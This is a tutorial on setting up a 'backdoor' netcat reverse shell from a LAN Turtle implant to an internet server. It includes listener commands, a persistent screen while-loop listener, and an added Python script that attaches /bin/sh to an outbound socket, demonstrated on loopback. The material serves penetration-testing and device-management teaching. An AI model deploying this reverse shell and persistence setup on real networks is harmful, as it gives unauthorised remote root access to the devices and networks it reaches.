Your First Reverse Shell
“Netcat (often abbreviated to nc) is a computer networking service for reading from and writing to network connections using TCP or UDP.
Netcat is designed to be a dependable back-end that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and investigation tool, since it can produce almost any kind of correlation its user could need and has a number of built-in capabilities.
Its list of features includes port scanning, transferring files, and port listening, and it can be used as a backdoor.” (Wikipedia)
In this section we’ll set up a “backdoor” on the LAN Turtle with Netcat. A server on the Internet will host a Netcat listener on port 8080, and the LAN Turtle’s NetCat Reverse Shell module will be configured to connect out to that listener every time the Turtle boots.
Begin by SSH’ing into your server. There are many inexpensive options for this, and a good VPS or shell account is highly recommended. Most VPS hosts provide a static IP address and the operating system of your choice. In this example we’ll assume you have an Ubuntu server at 126.96.36.199. From the SSH session with that server, start a netcat listener on port 8080.
nc -lp 8080
Netcat is included by default on most Linux distributions. If it is not, install it from the repositories. Note that Debian and Ubuntu ship two implementations with different flag syntax: netcat-traditional expects -l together with -p to set the listening port, while netcat-openbsd takes the port as a bare argument after -l and may reject -p in combination with -l (in that case drop the -p and pass the port on its own). On Ubuntu the package installed by the following apt-get command is normally the OpenBSD variant:
apt-get install netcat
With our netcat listener running on the server, we’re ready to configure the LAN Turtle. From the SSH session with the LAN Turtle, navigate to the Modules section of the Turtle Shell. Select the NetCat Reverse Shell module and choose Configure. When prompted, enter the IP address and port number of your server’s netcat listener. In our example the IP address is 126.96.36.199 and the port number is 8080. Tab over to Submit and press enter to save these values.
Now that the NetCat Reverse Shell module is configured, it can be tested by tabbing over to the Start option and pressing enter. You’ll receive a notice that the module has started. Press enter to return to the module screen and notice the current status and bootup status.
From the netcat listener on our server it may not be apparent that anything has happened. This is because the reverse shell attaches the Turtle’s shell directly to the socket rather than to a terminal: the shell is non-interactive, so it prints no prompt. Anything you type is still executed on the LAN Turtle just as it would be over an SSH connection, and the output comes back over the same socket. Try using cat to print the login banner.
From the SSH session on the LAN Turtle, tab over to the Stop option on the module screen and press enter. You’ll receive a notice that the module has stopped. Now go back and look at the netcat listener on the server: it will have terminated, because a plain nc -l exits as soon as its single connection closes. This means that starting the module again will fail, since there is no longer anything listening on port 8080. To solve this we can either use a netcat that can keep listening after a connection closes (the OpenBSD netcat’s -k option does this when combined with -l), or run the netcat listener inside a while loop in a screen session.
From the server, try the following:
screen -dmS netcat_listener bash -c 'while true; do nc -lp 8080; done'
This will create a new detached screen session that stays running even after you disconnect the SSH session with the server. The screen session runs the bash one-liner while true; do nc -lp 8080; done, which restarts the netcat listener as soon as it terminates. Bear in mind that the loop has no delay: if nc cannot bind the port (for example because it is already in use) the loop will spin, restarting nc as fast as it fails, so a short sleep in the loop body is a sensible addition. You can display the running screen sessions with the screen -list command, and reconnect to a running screen session with the screen -r netcat_listener command. Detach from the screen session again using the CTRL+a, d keyboard combination.
Similar to NetCat, if screen isn’t installed by default on your server you may install it from the repositories. For example, on Ubuntu you may issue apt-get install screen.
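To make the mechanics above concrete without a second machine, here is both ends of the exchange in Python, run on loopback. This is an added example for this page; it is not Hak5’s NetCat Reverse Shell module and not netcat. The server side mirrors the while loop around nc (accept one connection, drive the shell, go back to listening), and the client side is what the Turtle module is assumed to do: connect out and attach /bin/sh to the socket. Because the shell’s stdin is a socket rather than a terminal, no prompt ever appears, which is the behaviour the text describes. The only requirements are /bin/sh and the Python standard library; the sessions and commands at the bottom are constructed sample input.

```python
"""Both ends of a netcat-style reverse shell, run on loopback.

Added example for this page, not Hak5's NetCat Reverse Shell module and not
netcat itself. Server side mirrors `while true; do nc -lp 8080; done`: accept a
connection, drive the shell, then listen again. Client side is what the Turtle
module is assumed to do (an assumption): connect out and attach /bin/sh to the
socket. Needs only /bin/sh and the standard library.
"""
import socket
import subprocess
import threading


def reverse_shell_client(host, port):
    """Turtle side: connect back and hand the socket to a non-interactive /bin/sh.

    stdin is a socket rather than a terminal, so the shell prints no prompt;
    that is why the listener looks idle until a command is sent.
    """
    with socket.create_connection((host, port)) as s:
        fd = s.fileno()
        subprocess.run(["/bin/sh"], stdin=fd, stdout=fd, stderr=fd, check=False)
        # returns once the listener sends 'exit' or closes the connection


def drive_session(conn, commands):
    """Server side for one connection: send commands, then 'exit', collect output."""
    with conn:
        for cmd in commands:
            conn.sendall(cmd.encode() + b"\n")
        conn.sendall(b"exit\n")  # make the remote shell quit so recv() sees EOF
        chunks = []
        while True:
            data = conn.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks).decode(errors="replace")


def bind_listener(host="127.0.0.1", port=0):
    """Bind and listen. Port 0 lets the OS pick a free port; read it back with getsockname()."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))
    srv.listen(5)
    return srv


def serve(listener, sessions):
    """Accept one connection per session, in turn, like the while loop around nc.

    A lone `nc -lp 8080` exits when its first connection closes; looping over
    accept() is what keeps the listener available for the Turtle's next boot.
    """
    return [drive_session(listener.accept()[0], commands) for commands in sessions]


def demo(sessions):
    """Run listener and clients on loopback: one client connection per session."""
    srv = bind_listener()
    host, port = srv.getsockname()
    results = []
    server = threading.Thread(target=lambda: results.extend(serve(srv, sessions)))
    server.start()
    try:
        for _ in sessions:  # each Turtle boot is one fresh connection
            reverse_shell_client(host, port)
        server.join(timeout=30)
    finally:
        srv.close()
    return results


if __name__ == "__main__":
    # Constructed sample input: two "boots", a few commands each.
    for i, out in enumerate(demo([["id", "uname -a"], ["echo second boot"]]), 1):
        print(f"--- session {i} ---\n{out}", end="")
```

Run it and note that the captured output contains only command results, never a prompt, and that the second session is served only because serve() goes back to accept() after the first connection closes, exactly what the while loop buys you over a single nc. A real listener would bind a public address rather than 127.0.0.1, and, like the netcat version, it has no authentication and no encryption.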
With this more robust listener running, we can now enable the NetCat Reverse Shell module on the LAN Turtle. With the module enabled, the Turtle will attempt to connect back to our server every time it boots.
This is a very basic reverse shell over netcat. It can be used to manage the LAN Turtle from afar, as long as both you and the LAN Turtle can reach the server. Keep its limits in mind: the connection carries commands and output in cleartext, the listener accepts whatever connects to port 8080 first with no authentication, and the Turtle will hand a root shell to whoever is answering at that address. Restricting port 8080 on the server to the addresses you expect the Turtle to connect from is a sensible minimum. What the exercise illustrates is the basic process of configuring, testing, enabling and deploying a module on the LAN Turtle.
Taking this a step further, I highly encourage setting up a persistent reverse shell over SSH instead: the AutoSSH module is much more robust than netcat, encrypts and authenticates the connection, and has built-in keepalive features. The process is very similar; it just requires generating a public/private key pair with the Key Manager module first.